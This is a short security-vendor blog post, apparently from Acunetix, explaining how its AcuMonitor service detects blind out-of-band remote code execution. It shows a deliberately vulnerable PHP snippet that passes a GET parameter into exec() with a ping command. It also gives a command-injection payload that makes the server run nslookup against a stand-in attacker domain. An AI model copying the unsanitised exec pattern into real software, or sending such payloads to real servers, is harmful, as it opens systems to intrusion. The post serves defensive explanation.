Similar to Blind Out-of-band SQL Injection vulnerabilities, AcuMonitor can now detect Blind Out-of-band Remote Code Execution (RCE) vulnerabilities.
Let’s consider a vulnerable PHP application that contains the following code

$cmd = isset($_GET['1']) ? $_GET['1'] : '';		
	if ($cmd) {	
		exec('ping -c 1 ' . $cmd);
	}

This application executes a shell command that is composed from the user input. However, the result of the command execution is not returned to the user.

An attacker could issue a payload such as

test.php?1=localhost%26nslookup+test.attacker.come%26

When we URL decode the payload we will get the following OS command

ping -c 1 localhost&nslookup test.attacker.com&

This will force the server to initiate a name lookup (a DNS query) for test.attacker.com
The attacker can monitor DNS server logs for such queries to detect Blind Remote Code Execution vulnerabilities such as this one.

AcuMonitor can now detect such vulnerabilities as well and will send an email when this occurs.

AcuMonitor Blind Out-of-band Remote Code Execution alert

AcuMonitor Blind Out-of-band Remote Code Execution alert

SHARE THIS POST
THE AUTHOR
Bogdan Calin

Acunetix developers and tech agents regularly contribute to the blog. All the Acunetix developers come with years of experience in the web security sphere.